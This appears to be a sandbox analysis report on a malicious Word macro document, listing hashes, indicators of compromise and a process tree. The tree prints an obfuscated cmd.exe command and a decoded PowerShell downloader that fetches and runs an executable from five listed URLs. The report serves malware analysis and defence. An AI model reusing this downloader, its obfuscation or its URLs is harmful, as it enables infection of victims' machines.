Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
138s -
max time network
128s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
28/05/2024, 21:08
Behavioral task
behavioral1
Sample
7e6980371f32c621d20998ef8e211bac_JaffaCakes118.doc
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
7e6980371f32c621d20998ef8e211bac_JaffaCakes118.doc
Resource
win10v2004-20240508-en
General
-
Target
7e6980371f32c621d20998ef8e211bac_JaffaCakes118.doc
-
Size
66KB
-
MD5
7e6980371f32c621d20998ef8e211bac
-
SHA1
593532859a14a3cd2f46eba73f5398641544d551
-
SHA256
6ccd4c745fb1d6d9e1629b3eb80fc7e8286c902e3629f59a3677d3b9375497e0
-
SHA512
5a328991d18a379fc5606b757cd7c9c3da2500bc4ae7ac0d33401b1bb0d51ecbff2cb02adf5b4239807a1460b58dee4127e79383cd93724d708da797e60b1364
-
SSDEEP
768:BpJcaUitGAlmrJpmxlzC+w99NBs+1owTRj5EnAYspPZiFfqPd:BptJlmrJpmxlRw99NBs+awly9spPZO
Malware Config
Extracted
http://laschuk.com.br/C7f65h8p
http://jobarba.com/wp-content/nY7NWG7z
http://familiekoning.net/YT9gzKUs
http://www.ultigamer.com/wp-admin/includes/OCklr3Q
http://fluorescent.cc/ttQoKkJ4sC
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 5052 1472 cmd.exe 81 -
Blocklisted process makes network request 4 IoCs
flow pid Process 31 4312 powershell.exe 34 4312 powershell.exe 36 4312 powershell.exe 38 4312 powershell.exe -
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
pid Process 5052 cmd.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 1472 WINWORD.EXE 1472 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4312 powershell.exe 4312 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4312 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 1472 WINWORD.EXE 1472 WINWORD.EXE 1472 WINWORD.EXE 1472 WINWORD.EXE 1472 WINWORD.EXE 1472 WINWORD.EXE 1472 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 1472 wrote to memory of 5052 1472 WINWORD.EXE 85 PID 1472 wrote to memory of 5052 1472 WINWORD.EXE 85 PID 5052 wrote to memory of 4312 5052 cmd.exe 92 PID 5052 wrote to memory of 4312 5052 cmd.exe 92
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\7e6980371f32c621d20998ef8e211bac_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1472 -
C:\Windows\SYSTEM32\cmd.execmd /V^:/C"^se^t ^3^s^H= ^ ^ ^ ^ ^ }^}{hctac}^;^kaerb^;q^jV$ ^metI-e^kovn^I^;)^qjV^$ ^,r^YC^$(^eli^Fdaoln^w^o^D.Vn^F^$^{yrt{)^T^wi$^ n^i^ rYC^$(^hc^a^erof^;'^e^xe.^'+^B^d^Y^$+'^\^'+c^ilbu^p^:vn^e$^=^qjV$^;^'8^4^3'^ =^ B^dY$;)'^@'(^t^i^lpS^.'Cs^4Jk^K^oQt^t/cc.^tn^ec^seroulf//^:^p^tt^h^@Q3rl^kCO/^sedulcn^i/n^i^md^a-^pw/^m^oc.re^mag^i^t^l^u^.^w^ww//^:^p^tt^h@^s^UKz^g^9^TY/^ten.gnino^ke^i^li^m^a^f//:^p^tt^h^@z^7^G^WN7^Yn/^tn^etnoc^-pw/^m^oc^.a^br^a^b^o^j//^:ptth^@^p8h5^6f^7C/rb^.m^oc.k^u^hcsal//:^p^tth'^=T^wi$^;tneilC^be^W^.^teN ^tcejb^o-wen^=VnF$ ^ll^e^h^sr^ewo^p&&f^or /^L %^g ^in (^3^9^7^;^-1;^0)^d^o s^et ^K^3^X^e=!^K^3^X^e!!^3^s^H:~%^g,1!&&^if %^g ^l^e^q ^0 c^a^l^l %^K^3^X^e:~^-3^9^8%"2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:5052 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $FnV=new-object Net.WebClient;$iwT='http://laschuk.com.br/C7f65h8p@http://jobarba.com/wp-content/nY7NWG7z@http://familiekoning.net/YT9gzKUs@http://www.ultigamer.com/wp-admin/includes/OCklr3Q@http://fluorescent.cc/ttQoKkJ4sC'.Split('@');$YdB = '348';$Vjq=$env:public+'\'+$YdB+'.exe';foreach($CYr in $iwT){try{$FnV.DownloadFile($CYr, $Vjq);Invoke-Item $Vjq;break;}catch{}}3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4312
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851227[[fn=sist02]].xsl
Filesize245KB
MD5f883b260a8d67082ea895c14bf56dd56
SHA17954565c1f243d46ad3b1e2f1baf3281451fc14b
SHA256ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353
SHA512d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e
-
Filesize
114B
MD5e89f75f918dbdcee28604d4e09dd71d7
SHA1f9d9055e9878723a12063b47d4a1a5f58c3eb1e9
SHA2566dc9c7fc93bb488bb0520a6c780a8d3c0fb5486a4711aca49b4c53fac7393023
SHA5128df0ab2e3679b64a6174deff4259ae5680f88e3ae307e0ea2dfff88ec4ba14f3477c9fe3a5aa5da3a8e857601170a5108ed75f6d6975958ac7a314e4a336aed0